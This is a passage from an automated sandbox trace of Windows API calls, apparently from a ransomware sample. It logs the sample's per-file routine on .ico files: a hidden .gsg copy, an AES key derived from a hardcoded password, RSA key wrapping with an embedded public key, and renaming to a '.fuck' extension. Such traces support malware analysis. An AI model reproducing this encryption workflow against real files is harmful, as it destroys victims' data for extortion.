Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.748] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d52b0) returned 1 [0239.753] CryptCreateHash (in: hProv=0x28d52b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.753] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.753] CryptHashData (hHash=0x28bf1d8, pbData=0x2889628, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.753] CryptDeriveKey (in: hProv=0x28d52b0, Algid=0x6610, hBaseData=0x28bf1d8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf218) returned 1 [0239.753] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.753] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.753] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d5800) returned 1 [0239.754] CryptImportPublicKeyInfo (in: hCryptProv=0x28d5800, dwCertEncodingType=0x1, pInfo=0x28c9598*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c95c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c95d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28be798) returned 1 [0239.754] CryptEncrypt (in: hKey=0x28be798, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.754] CryptEncrypt (in: hKey=0x28be798, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5558*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d5558*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.754] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5558, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.754] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28d9aa8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.754] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.754] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.754] CloseHandle (hObject=0xffffffff) returned 1 [0239.754] CloseHandle (hObject=0xffffffff) returned 1 [0239.754] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), bFailIfExists=0) returned 0 [0239.755] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", dwFileAttributes=0x0) returned 0 [0239.755] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg")) returned 0 [0239.756] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.fuck")) returned 0 [0239.756] CryptDestroyHash (hHash=0x28bf1d8) returned 1 [0239.756] CryptDestroyKey (hKey=0x28bf218) returned 1 [0239.756] CryptReleaseContext (hProv=0x28d52b0, dwFlags=0x0) returned 1 [0239.756] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.756] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.757] GetLastError () returned 0x5 [0239.757] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico")) returned 0x20 [0239.757] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", dwFileAttributes=0x80) returned 0 [0239.757] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.758] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.758] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.759] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d4bc8) returned 1 [0239.761] CryptCreateHash (in: hProv=0x28d4bc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.761] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.761] CryptHashData (hHash=0x28bf018, pbData=0x28898a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.761] CryptDeriveKey (in: hProv=0x28d4bc8, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf218) returned 1 [0239.761] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.761] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.761] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d52b0) returned 1 [0239.762] CryptImportPublicKeyInfo (in: hCryptProv=0x28d52b0, dwCertEncodingType=0x1, pInfo=0x28c9328*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9358*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9360*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bea58) returned 1 [0239.762] CryptEncrypt (in: hKey=0x28bea58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.762] CryptEncrypt (in: hKey=0x28bea58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5888*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d5888*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.762] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5888, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.762] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28d9aa8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.762] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.762] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.762] CloseHandle (hObject=0xffffffff) returned 1 [0239.762] CloseHandle (hObject=0xffffffff) returned 1 [0239.762] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), bFailIfExists=0) returned 0 [0239.763] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", dwFileAttributes=0x0) returned 0 [0239.764] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg")) returned 0 [0239.764] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.fuck")) returned 0 [0239.765] CryptDestroyHash (hHash=0x28bf018) returned 1 [0239.765] CryptDestroyKey (hKey=0x28bf218) returned 1 [0239.765] CryptReleaseContext (hProv=0x28d4bc8, dwFlags=0x0) returned 1 [0239.765] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.765] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.765] GetLastError () returned 0x5 [0239.765] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico")) returned 0x20 [0239.765] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", dwFileAttributes=0x80) returned 0 [0239.766] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.766] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.767] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.767] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d5a20) returned 1 [0239.770] CryptCreateHash (in: hProv=0x28d5a20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.770] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.770] CryptHashData (hHash=0x28bf018, pbData=0x2889718, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.770] CryptDeriveKey (in: hProv=0x28d5a20, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf218) returned 1 [0239.770] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.770] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.770] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d5910) returned 1 [0239.770] CryptImportPublicKeyInfo (in: hCryptProv=0x28d5910, dwCertEncodingType=0x1, pInfo=0x28c9db8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9de8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9df0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28be598) returned 1 [0239.770] CryptEncrypt (in: hKey=0x28be598, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.771] CryptEncrypt (in: hKey=0x28be598, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d4bc8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d4bc8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.771] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d4bc8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.771] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28d9aa8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.771] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.771] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.771] CloseHandle (hObject=0xffffffff) returned 1 [0239.771] CloseHandle (hObject=0xffffffff) returned 1 [0239.771] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), bFailIfExists=0) returned 0 [0239.772] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", dwFileAttributes=0x0) returned 0 [0239.772] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg")) returned 0 [0239.772] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.fuck")) returned 0 [0239.773] CryptDestroyHash (hHash=0x28bf018) returned 1 [0239.773] CryptDestroyKey (hKey=0x28bf218) returned 1 [0239.773] CryptReleaseContext (hProv=0x28d5a20, dwFlags=0x0) returned 1 [0239.773] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.773] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.773] GetLastError () returned 0x5 [0239.773] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico")) returned 0x20 [0239.773] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", dwFileAttributes=0x80) returned 0 [0239.774] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.774] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.775] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.775] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d5998) returned 1 [0239.778] CryptCreateHash (in: hProv=0x28d5998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.778] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.778] CryptHashData (hHash=0x28bf218, pbData=0x2889830, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.778] CryptDeriveKey (in: hProv=0x28d5998, Algid=0x6610, hBaseData=0x28bf218, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf018) returned 1 [0239.778] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.778] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.778] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d5a20) returned 1 [0239.779] CryptImportPublicKeyInfo (in: hCryptProv=0x28d5a20, dwCertEncodingType=0x1, pInfo=0x28ca0f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28ca128*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28ca130*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28be7d8) returned 1 [0239.779] CryptEncrypt (in: hKey=0x28be7d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.779] CryptEncrypt (in: hKey=0x28be7d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5aa8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d5aa8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.779] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5aa8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.779] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28d9aa8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.779] CryptEncrypt (in: hKey=0x28bf018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d9aa8*, 